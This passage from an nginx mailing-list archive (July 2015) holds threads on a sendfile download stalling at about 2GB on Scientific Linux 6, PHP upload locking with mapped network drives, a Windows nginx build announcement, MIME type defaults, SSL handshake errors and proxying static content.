Running Nginx 1.9.2 on Scientific Linux 6 with a 2.6.32-504.8.1.el6.x86_64 kernel, nginx is configured to serve a large file (4GB) with sendfile enabled, the file download hangs exactly after 2147479552 bytes, after ~ 60s the connection is dropped (presumably because of the default send_timeout).

Setting sendfile_max_chunk to 1G fixes the problem

Longer version:

# Create a random 4G file:
mkdir /tmp/test
dd if=/dev/urandom of=/tmp/test/bigfile bs=1M count=4096

# Basic NGINX configuration /tmp/nginx.conf:
worker_processes 1;
daemon off;

events {
    worker_connections 768;
}

http {
    sendfile on;
    access_log /tmp/access.log;
    error_log /tmp/error.log debug;

    server {
        listen 8080 default_server;

        location / {
            root /tmp/test/;
        }
    }
}

# Nginx 1.9.2 was compiled by hand:
nginx -V
nginx version: nginx/1.9.2
built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC)
built with OpenSSL 1.0.1e-fips 11 Feb 2013
TLS SNI support enabled
configure arguments: --prefix=/tmp/opt --conf-path=/etc/nginx/nginx.conf --error-log-path=/tmp/error.log --http-log-path=/tmp/access.log --pid-path=/tmp/nginx.pid --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-cc-opt='-O2 -g -pipe -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic' --without-pcre --without-http_rewrite_module --with-debug

# Run nginx with the above configuration (non-root user, hence all the
# /tmp/ stuff above)
nginx -c /tmp/nginx.conf

# On the same machine run a wget (auto-retry disabled):
$ wget http://localhost:8080/bigfile -O /dev/null -t 1
--2015-07-10 17:02:22-- http://localhost:8080/bigfile
Resolving localhost... 127.0.0.1, ::1
Connecting to localhost|127.0.0.1|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4294967296 (4.0G) [text/plain]
Saving to: "/dev/null"

49% [===================================================================================> ] 2,147,479,552 --.-K/s in 96s

2015-07-10 17:03:58 (21.4 MB/s) - Connection closed at byte 2147479552. Giving up.
# The error logs is visible at: # https://gist.githubusercontent.com/mathiasuk/9022d3458ef373db1775/raw/e483a69aae10805558fefc4eefb381e34bbbeaf9/error-sc6.5.log I tried the same thing on an Ubuntu 14.04.2 without problem, however, in this case the sendfile system call always reads much fewer bytes at a time https://gist.githubusercontent.com/mathiasuk/018e0462d8788288d0d3/raw/error-ubuntu-14.04.02.log : $ grep sendfile /tmp/error-ubuntu-14.04.02.log|head 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @0 2147479552 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 3557719 of 2147479552 @0 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @3557719 2147481257 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 7792477 of 2147481257 @3557719 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @11350196 2147483468 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1833524 of 2147483468 @11350196 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @13183720 2147480856 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1899007 of 2147480856 @13183720 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @15082727 2147482393 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1964490 of 2147482393 @15082727 Whereas on the SL6 box sendfile tries to read 2147479552 in one go and nginx then seems to stop there: $ grep sendfile /tmp/error-sc6.5.log 2015/07/10 17:02:22 [debug] 22749#0: *1 sendfile: @0 2147479552 2015/07/10 17:02:22 [debug] 22749#0: *1 sendfile: 2147479552 of 2147479552 @0 I'm not sure if this is the right place to post this, please point me in the right direction if not :) Let me know if I can provide more information or details. Cheers, Mathias -- * Mathias Andre Web & Advanced Projects Coordinator *E S* European Southern Observatory ESO Education & Public Outreach Department O Karl Schwarzschildstr. 2 * D-85748 Garching Phone : +49 (0)89 3200 6760 Germany Office 246 "For every problem, there is a solution that is simple, neat, and wrong." H. L. 
Mencken

From nginx-forum at nginx.us Fri Jul 10 16:03:54 2015
From: nginx-forum at nginx.us (birimblongas)
Date: Fri, 10 Jul 2015 12:03:54 -0400
Subject: Problem with devise and nginx proxy cache
Message-ID: <6a6b7926871ac264e516b8b872e50a33.NginxMailingListEnglish@forum.nginx.org>

Hi.

I have a RoR project which was working just fine. But i've tried to follow this site and add proxy cache to my nginx config: http://vstark.net/2012/10/21/nginx-unicorn-performance-tweaks/ and devise just won't sign_in anymore. I don't get any errors, just don't sign_in and redirect me to login again.

As the author from the link suggested to someone with same problem as I, i've done this on my nginx conf:

location = /users/sign_in{
    proxy_pass http://app;
    proxy_set_header Host $http_host;
    proxy_ignore_headers Set-Cookie;
    proxy_ignore_headers Cache-Control;
    proxy_cache_bypass $http_secret_header;
    add_header X-Cache-Status $upstream_cache_status;
}

The same to /login. But devise still won't sign_in. Anyone knows how to solve that? Any more configs so I can skip cache to sign_in?

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260188,260188#msg-260188

From nginx-forum at nginx.us Fri Jul 10 18:34:24 2015
From: nginx-forum at nginx.us (c0nw0nk)
Date: Fri, 10 Jul 2015 14:34:24 -0400
Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time
Message-ID: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org>

So i have Nginx as a web server with PHP running as fastcgi what nginx serves traffic via upstreams.

The strange bug i have encountered is the fact when i upload a large file let's say 2GB and PHP must pass this file to a mapped hard drive via network sharing. PHP/Nginx does not serve traffic to anyone until that temp(uploaded file) has been successfully moved to the mapped hard drive.

Does anyone know why it would be locking up like this or how to solve it ? I don't think it is Nginx i think it is just PHP that is locking up.
But it is a nightmare trying to figure out how to keep it serving traffic since there will be 60-120 seconds while PHP is pushing this file to the mapped hard drive that no traffic gets served and everyone's pages keep loading (they don't time out just keep loading / waiting for first byte what is always sent as soon as the file upload is complete.)

If it helps its latest php builds default production config and itpp2012's Nginx Build.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260193#msg-260193

From nginx-forum at nginx.us Fri Jul 10 19:06:46 2015
From: nginx-forum at nginx.us (itpp2012)
Date: Fri, 10 Jul 2015 15:06:46 -0400
Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time
In-Reply-To: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org>
References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org>

There is a no_buffer option for proxy you could try (see regular manual for correct function name).
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260194#msg-260194

From nginx-forum at nginx.us Fri Jul 10 19:07:38 2015
From: nginx-forum at nginx.us (itpp2012)
Date: Fri, 10 Jul 2015 15:07:38 -0400
Subject: [ANN] Windows nginx 1.9.3.1 Lizard
Message-ID: <69390b2a74a8704d4e45a60ac3883e34.NginxMailingListEnglish@forum.nginx.org>

18:54 10-7-2015 nginx 1.9.3.1 Lizard

Based on nginx 1.9.3 (10-7-2015) with;
+ Openssl-1.0.1p (CVE-2015-1793)
+ nginx-module-vts (new fix for 32bit total overflow counters)
+ Array-var-nginx-module v0.04 (upgraded 29-6-2015)
+ echo-nginx-module v0.58 (upgraded 29-6-2015)
+ encrypted-session-nginx-module v0.04 (upgraded 29-6-2015)
+ headers-more-nginx-module v0.26 (upgraded 29-6-2015)
+ lua-nginx-module v0.9.16 (upgraded 29-6-2015)
+ set-misc-nginx-module v0.29 (upgraded 29-6-2015)
+ pcre-8.37b-r1573 (upgraded 29-6-2015, more overflow fixes)
+ Source changes back ported
+ Source changes add-on's back ported
+ Changes for nginx_basic: Source changes back ported
* Scheduled release: yes
* Additional specifications: see 'Feature list'

Builds can be found here:
http://nginx-win.ecsds.eu/
Follow releases https://twitter.com/nginx4Windows

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260195,260195#msg-260195

From nginx-forum at nginx.us Fri Jul 10 19:17:13 2015
From: nginx-forum at nginx.us (c0nw0nk)
Date: Fri, 10 Jul 2015 15:17:13 -0400
Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time
In-Reply-To: <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org>
References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org>

Hi itpp2012 thanks for the swift response :),

I am not proxying to PHP Nginx passes the request to the fastcgi upstream Nginx + PHP are both on the same machine just the storage
machine (the mapped hard drive) is separate.

I did look in the docs and find this "fastcgi_buffering off;" And "proxy_buffering off;"
http://nginx.org/en/docs/http/ngx_http_fastcgi_module.html#fastcgi_buffering
http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_buffering

Is that what you are referring to ? I will give a go with those directives and reply back if it is fixed or not.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260196#msg-260196

From nginx-forum at nginx.us Fri Jul 10 19:48:14 2015
From: nginx-forum at nginx.us (itpp2012)
Date: Fri, 10 Jul 2015 15:48:14 -0400
Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time
In-Reply-To: <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org>
References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org>

c0nw0nk Wrote:
-------------------------------------------------------
> I did look in the docs and find this "fastcgi_buffering off;" And "proxy_buffering off;"
>
> Is that what you are referring to ?

Yea that's it, I knew they were there but couldn't remember them as fast.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260197#msg-260197

From igal at lucee.org Fri Jul 10 19:50:53 2015
From: igal at lucee.org (Igal @ Lucee.org)
Date: Fri, 10 Jul 2015 12:50:53 -0700
Subject: [ANN] Windows nginx 1.9.3.1 Lizard
In-Reply-To: <69390b2a74a8704d4e45a60ac3883e34.NginxMailingListEnglish@forum.nginx.org>
References: <69390b2a74a8704d4e45a60ac3883e34.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <55A0221D.3050703@lucee.org>

> On 7/10/2015 12:07 PM, itpp2012 wrote:
>> Based on nginx 1.9.3 (10-7-2015) with;

is there a release for nginx 1.9.3 (non-Lizard)?
I do not see it at http://nginx.org/en/download.html

thanks,

Igal Sapir
Lucee Core Developer
Lucee.org

On 7/10/2015 12:07 PM, itpp2012 wrote:
> 18:54 10-7-2015 nginx 1.9.3.1 Lizard
>
> Based on nginx 1.9.3 (10-7-2015) with;
> + Openssl-1.0.1p (CVE-2015-1793)
> + nginx-module-vts (new fix for 32bit total overflow counters)
> + Array-var-nginx-module v0.04 (upgraded 29-6-2015)
> + echo-nginx-module v0.58 (upgraded 29-6-2015)
> + encrypted-session-nginx-module v0.04 (upgraded 29-6-2015)
> + headers-more-nginx-module v0.26 (upgraded 29-6-2015)
> + lua-nginx-module v0.9.16 (upgraded 29-6-2015)
> + set-misc-nginx-module v0.29 (upgraded 29-6-2015)
> + pcre-8.37b-r1573 (upgraded 29-6-2015, more overflow fixes)
> + Source changes back ported
> + Source changes add-on's back ported
> + Changes for nginx_basic: Source changes back ported
> * Scheduled release: yes
> * Additional specifications: see 'Feature list'
>
> Builds can be found here:
> http://nginx-win.ecsds.eu/
> Follow releases https://twitter.com/nginx4Windows
>
> Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260195,260195#msg-260195

From nginx-forum at nginx.us Fri Jul 10 20:12:14 2015
From: nginx-forum at nginx.us (itpp2012)
Date: Fri, 10 Jul 2015 16:12:14 -0400
Subject: [ANN] Windows nginx 1.9.3.1 Lizard
In-Reply-To: <55A0221D.3050703@lucee.org>
References: <55A0221D.3050703@lucee.org>
Message-ID:

Igal @ Lucee.org Wrote:
-------------------------------------------------------
> > On 7/10/2015 12:07 PM, itpp2012 wrote:
> >> Based on nginx 1.9.3 (10-7-2015) with;
> is there a release for nginx 1.9.3 (non-Lizard)?
> I do not see it at
> http://nginx.org/en/download.html

This nginx for Windows does not come from nginx.org

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260195,260201#msg-260201

From nginx-forum at nginx.us Fri Jul 10 20:21:36 2015
From: nginx-forum at nginx.us (c0nw0nk)
Date: Fri, 10 Jul 2015 16:21:36 -0400
Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time
In-Reply-To: <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org>
References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org>

Those directives did not fix it.

But i decided to investigate sessions and temporary upload directory of PHP.

Now the temporary session directory gave me the same no loading issue until uploads have been moved to the mapped hard drive by php. But the following seemed to change that and actually allow me to keep serving traffic with uploads being pushed to the mapped hard drive.

Inside PHP.INI

[PATH=C:/server/websites/public_www]
upload_tmp_dir=Z:/server/websites/temp-uploads

C:/ is the local machine drive where nginx + php is present.
Z:/ is the external mapped hard drive.

Now i don't know why that seems to fix it perhaps someone can elaborate ? Also it comes at a cost it takes twice as long for a upload to be pushed to a mapped hard drive for some reason like that.
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260202#msg-260202

From nginx-forum at nginx.us Fri Jul 10 20:40:28 2015
From: nginx-forum at nginx.us (itpp2012)
Date: Fri, 10 Jul 2015 16:40:28 -0400
Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time
In-Reply-To: <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org>
References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org> <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

Sounds like a blocking disk driver issue, look at the driver settings, dma/pio/caching/advanced sata/etc...

Dynamic content is also best served from a different drive (virtual or real) than where nginx is running from.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260204#msg-260204

From nginx-forum at nginx.us Fri Jul 10 21:06:59 2015
From: nginx-forum at nginx.us (c0nw0nk)
Date: Fri, 10 Jul 2015 17:06:59 -0400
Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time
In-Reply-To:
References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org> <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <8fc74cb8c0ddb21f6fe9805172dd4b98.NginxMailingListEnglish@forum.nginx.org>

Thanks for the information :) everything is default though so i am not sure what i should even be changing anything to.
On the mapped hard drive "Z:/" it has the settings http://i633.photobucket.com/albums/uu52/C0nw0nk/Untitled9.png

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260205#msg-260205

From igal at lucee.org Fri Jul 10 21:11:32 2015
From: igal at lucee.org (Igal @ Lucee.org)
Date: Fri, 10 Jul 2015 14:11:32 -0700
Subject: [ANN] Windows nginx 1.9.3.1 Lizard
In-Reply-To:
References: <55A0221D.3050703@lucee.org>
Message-ID: <55A03504.2080201@lucee.org>

On 7/10/2015 1:12 PM, itpp2012 wrote:
> This nginx for Windows does not come from nginx.org

right, but it says that it is based on nginx 1.9.3 which I can not find anywhere, so my question is: was nginx 1.9.3 released already or not yet?

From nginx-forum at nginx.us Fri Jul 10 21:41:14 2015
From: nginx-forum at nginx.us (itpp2012)
Date: Fri, 10 Jul 2015 17:41:14 -0400
Subject: [ANN] Windows nginx 1.9.3.1 Lizard
In-Reply-To: <55A03504.2080201@lucee.org>
References: <55A03504.2080201@lucee.org>
Message-ID: <87316e32aa376000d0952062ae811af4.NginxMailingListEnglish@forum.nginx.org>

Igal @ Lucee.org Wrote:
-------------------------------------------------------
> right, but it says that it is based on nginx 1.9.3 which I can not
> find
> anywhere, so my question is: was nginx 1.9.3 released already or not
> yet?

No not yet, we always go with the latest sources, bleeding edge, you can find the original nginx.org sources on hg http://hg.nginx.org/nginx

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260195,260207#msg-260207

From subramaniam31784 at gmail.com Sat Jul 11 05:44:09 2015
From: subramaniam31784 at gmail.com (Subramaniam C)
Date: Sat, 11 Jul 2015 11:14:09 +0530
Subject: NGINX plus REST monitoring API query
Message-ID:

HI

I have deployed NGINX plus trial version in my setup. I have a query that if we use NGINX plus as a load balancer then is there any way to fetch the relationship between the virtual servers and its attached pool of servers configured in NGINX through REST monitoring API's?
Thanks and Regards
Subramaniam

From r1ch+nginx at teamliquid.net Sat Jul 11 16:46:32 2015
From: r1ch+nginx at teamliquid.net (Richard Stanway)
Date: Sat, 11 Jul 2015 18:46:32 +0200
Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time
In-Reply-To: <8fc74cb8c0ddb21f6fe9805172dd4b98.NginxMailingListEnglish@forum.nginx.org>
References: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> <201051db45a4e665f4d887303b99e7d2.NginxMailingListEnglish@forum.nginx.org> <1583028c329eb7eafa732fd5c7f317b8.NginxMailingListEnglish@forum.nginx.org> <798016ab3945d7c7baf889aa7a20cf87.NginxMailingListEnglish@forum.nginx.org> <30fa9fc44d2f14e218e122f2fe5fc4e7.NginxMailingListEnglish@forum.nginx.org> <8fc74cb8c0ddb21f6fe9805172dd4b98.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

This is expected behavior if you are using PHP sessions. See http://php.net/manual/en/function.session-write-close.php

On Fri, Jul 10, 2015 at 11:06 PM, c0nw0nk wrote:
> Thanks for the information :) everything is default though so i am not sure
> what i should even be changing anything to.
>
> On the mapped hard drive "Z:/" it has the settings
> http://i633.photobucket.com/albums/uu52/C0nw0nk/Untitled9.png
>
> Posted at Nginx Forum:
> http://forum.nginx.org/read.php?2,260193,260205#msg-260205

From nginx-forum at nginx.us Sat Jul 11 19:54:05 2015
From: nginx-forum at nginx.us (c0nw0nk)
Date: Sat, 11 Jul 2015 15:54:05 -0400
Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time
In-Reply-To:
References:
Message-ID:

So its because i'm using PHP's built in file session handler ? Should i switch it to maybe Wincache or something ?
Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260193,260215#msg-260215

From mdounin at mdounin.ru Sat Jul 11 22:43:48 2015
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Sun, 12 Jul 2015 01:43:48 +0300
Subject: Lost connection after reading 2147479552 bytes with sendfile
In-Reply-To: <20150710160130.GB16679@eso.org>
References: <20150710160130.GB16679@eso.org>
Message-ID: <20150711224348.GA93501@mdounin.ru>

Hello!

On Fri, Jul 10, 2015 at 06:01:30PM +0200, Mathias Andre wrote:

> I've bumped into a strange problem lately, and though I've found a
> workaround I thought I'd post here to try and understand what the
> underlying issue can be in case it affects anyone else.
>
> The short version is:
> Running Nginx 1.9.2 on Scientific Linux 6 with a
> 2.6.32-504.8.1.el6.x86_64 kernel, nginx is configured to serve a large
> file (4GB) with sendfile enabled, the file download hangs exactly after
> 2147479552 bytes, after ~ 60s the connection is dropped (presumably
> because of the default send_timeout).
>
> Setting sendfile_max_chunk to 1G fixes the problem

[...]
> I tried the same thing on an Ubuntu 14.04.2 without problem, however, in
> this case the sendfile system call always reads much fewer bytes at a
> time https://gist.githubusercontent.com/mathiasuk/018e0462d8788288d0d3/raw/error-ubuntu-14.04.02.log :
>
> $ grep sendfile /tmp/error-ubuntu-14.04.02.log|head
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @0 2147479552
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 3557719 of 2147479552 @0
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @3557719 2147481257
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 7792477 of 2147481257 @3557719
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @11350196 2147483468
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1833524 of 2147483468 @11350196
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @13183720 2147480856
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1899007 of 2147480856 @13183720
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @15082727 2147482393
> 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1964490 of 2147482393 @15082727
>
>
> Whereas on the SL6 box sendfile tries to read 2147479552 in one go and
> nginx then seems to stop there:
>
> $ grep sendfile /tmp/error-sc6.5.log
> 2015/07/10 17:02:22 [debug] 22749#0: *1 sendfile: @0 2147479552
> 2015/07/10 17:02:22 [debug] 22749#0: *1 sendfile: 2147479552 of 2147479552 @0

The 2147479552 is a limit applied by default to allow sendfile() to work with larger files on Linux up to 2.6.16 (see src/os/unix/ngx_linux_sendfile_chain.c for some comments). You can see the same limit on the first sendfile() call in the Ubuntu log as well.

The strange thing here is that on Scientific Linux 6 the call pretends it sent all the bytes in a single non-blocking call. This is not what nginx expects to ever happen, and this is what causes the problem to appear. It would be interesting to dig further to understand what causes this SL6 behaviour.
Using sendfile_max_chunk with some large value is a correct workaround and expected to work fine.

--
Maxim Dounin
http://nginx.org/

From mdounin at mdounin.ru Sun Jul 12 04:57:51 2015
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Sun, 12 Jul 2015 07:57:51 +0300
Subject: Wrong mimetype when served from nginx
In-Reply-To: <559F5F66.2010408@tengu.ch>
References: <559F5F66.2010408@tengu.ch>
Message-ID: <20150712045751.GC93501@mdounin.ru>

Hello!

On Fri, Jul 10, 2015 at 08:00:06AM +0200, Cédric Jeanneret wrote:

> Hello,
>
> I have a small issue with my nginx (1.2.1) configuration:
> some files are served as "application/octet-stream" while they are
> detected as "text/plain" by "mimetype " command.
>
> File names are just "1", "2", and so on.
>
> Is there a way to enforce mimetype for those files?

MIME types are determined by nginx according to file extensions. For files without extensions the default type is used. That is, if you want nginx to serve some files without extensions as text/plain, you'll have to set

    default_type text/plain;

in an appropriate context.

> I thought about something like this:
>
> location ~ /path/to/file/[0-9]+ {
>     types {}
>     default_type text/plain;
> }
>
> but after that, I get a 404 ? what did I wrong?

Your error log is likely to contain some details. Looking into it usually helps to understand what goes wrong.

Most likely, you have "root" configured in a location which was previously used to handle requests. There is no "root" in the new location you've added, so server default will be used (which is likely to be unset too). You'll have to either replicate the "root" directive in the location you are adding with default_type, or move it to the server{} level.
See these links for some additional hints:

http://nginx.org/r/location
http://nginx.org/r/root

--
Maxim Dounin
http://nginx.org/

From nginx-forum at nginx.us Sun Jul 12 16:33:09 2015
From: nginx-forum at nginx.us (flechamobile)
Date: Sun, 12 Jul 2015 12:33:09 -0400
Subject: Intermittent SSL Handshake Errors
In-Reply-To: <20150322011258.GT88631@mdounin.ru>
References: <20150322011258.GT88631@mdounin.ru>
Message-ID: <904b763879bbcb8bb5417269bdecc01d.NginxMailingListEnglish@forum.nginx.org>

I found myself with the same problem and found the cause (and obvious solution).

On my nginx server I run various websites and they all have their own server {} config block in separate files under 'sites-available' folder. Some sites are on different IP's and some are on the same IP.

Now the cause of the problem was because I had set 2 server blocks listening on the same IP on SSL for different server_names like so:

server {
    listen 37.230.101.215:443 ssl spdy;
    server_name www.domain1.com *.domain1.com;

    ssl on;
    ssl_certificate /etc/ssl/cert.crt;
    ssl_certificate_key /etc/ssl/key.key;
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 10m;

    ..etc
}

and for another site the same:

server {
    listen 37.230.101.215:443 ssl spdy;
    server_name www.domain2.com *.domain2.com;

    ssl on;
    ssl_certificate /etc/ssl/cert.crt;
    ssl_certificate_key /etc/ssl/key.key;
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 10m;

    ..etc
}

When you do this it gives the exact same error as this thread is about.. might be something to check.

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,256373,260227#msg-260227

From reallfqq-nginx at yahoo.fr Sun Jul 12 17:37:47 2015
From: reallfqq-nginx at yahoo.fr (B.R.)
Date: Sun, 12 Jul 2015 19:37:47 +0200
Subject: Intermittent SSL Handshake Errors
In-Reply-To: <904b763879bbcb8bb5417269bdecc01d.NginxMailingListEnglish@forum.nginx.org>
References: <20150322011258.GT88631@mdounin.ru> <904b763879bbcb8bb5417269bdecc01d.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

Out of thin air, I suspect it is a certificate problem. You seem to have configured *the same* certificate (and private key) for those 2 domains. Since certificates are generally tied to a single domain, that could explain errors.

Another idea: have you checked nginx has been built with SNI support and your client also supports it? Problems with SNI would mean the default server certificate (since you did not define a default server for your IP address/port pair, nginx would pick up the first block containing a 'listen' directive configured for it) would be presented whatever domain you are trying to access, ending up with certificate/domain mismatch.

See http://nginx.org/en/docs/http/configuring_https_servers.html.
---
*B. R.*

On Sun, Jul 12, 2015 at 6:33 PM, flechamobile wrote:

> I found myself with the same problem and found the cause (and obvious
> solution).
>
> On my nginx server I run various websites and they all have their own server
> {} config block in separate files under 'sites-available' folder.
> Some sites are on different IP's and some are on the same IP.
>
> Now the cause of the problem was because I had set 2 server blocks
> listening on the same IP on SSL for different server_names like so:
>
> server {
>     listen 37.230.101.215:443 ssl spdy;
>     server_name www.domain1.com *.domain1.com;
>
>     ssl on;
>     ssl_certificate /etc/ssl/cert.crt;
>     ssl_certificate_key /etc/ssl/key.key;
>     ssl_session_cache shared:SSL:10m;
>     ssl_session_timeout 10m;
>
>     ..etc
> }
>
> and for another site the same:
>
> server {
>     listen 37.230.101.215:443 ssl spdy;
>     server_name www.domain2.com *.domain2.com;
>
>     ssl on;
>     ssl_certificate /etc/ssl/cert.crt;
>     ssl_certificate_key /etc/ssl/key.key;
>     ssl_session_cache shared:SSL:10m;
>     ssl_session_timeout 10m;
>
>     ..etc
> }
>
> When you do this it gives the exact same error as this thread is about..
> might be something to check.
>
> Posted at Nginx Forum:
> http://forum.nginx.org/read.php?2,256373,260227#msg-260227

From nginx-forum at nginx.us Sun Jul 12 21:09:09 2015
From: nginx-forum at nginx.us (smsmaddy1981)
Date: Sun, 12 Jul 2015 17:09:09 -0400
Subject: remote server static content is not getting loaded
Message-ID:

Hi,

ISSUE: Static content is not loaded from remote server where application is deployed, rather it is reading from the server where NGinx is installed.
-------------------------------------------------------
Nginx-1.8.0 is installed (on the server nginx.corp.stel.no)
Proxy pass to another server (workspace.corp.stel.no) for an webrequest

Below configurations made:

server {
    listen 80;
    server_name workspace.corp.stel.no;

    location /{
        proxy_pass http://stelworkspace/workspace/agentLogin/;
    }

    location ~* \.(js|jpg|png|css|woff|svg|gif|eot|ttf)$ {
        root /var/gvp/Nginx/nginx-1.8.0/ser_static_info;
        expires 30d;
    }
}

This is reading data from local Nginx server (nginx.corp.test.no) and not from the remote server (workspace.corp.stel.no) where application is deployed

Tried below option too..

location ~"*\.(js|jpg|png|css)$" {
    root http://workspace123/workspace/;
    expires 30d;
}

Nothing seems working

Pls. assist here? If given an example...would be appreciated

Best regards,
Maddy

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260231,260231#msg-260231

From francis at daoine.org Sun Jul 12 21:44:22 2015
From: francis at daoine.org (Francis Daly)
Date: Sun, 12 Jul 2015 22:44:22 +0100
Subject: remote server static content is not getting loaded
In-Reply-To:
References:
Message-ID: <20150712214422.GU23844@daoine.org>

On Sun, Jul 12, 2015 at 05:09:09PM -0400, smsmaddy1981 wrote:

Hi there,

> ISSUE: Static content is not loaded from remote server where application is
> deployed, rather it is reading from the server where NGinx is installed.

http://forum.nginx.org/read.php?2,259786,259821

You do not want to use "root".

You do want to use "proxy_pass".

Exactly what "proxy_pass" to use, depends on what the answers to the questions in that mail are.
f
--
Francis Daly francis at daoine.org

From maxim at nginx.com Mon Jul 13 08:31:17 2015
From: maxim at nginx.com (Maxim Konovalov)
Date: Mon, 13 Jul 2015 11:31:17 +0300
Subject: NGINX plus REST monitoring API query
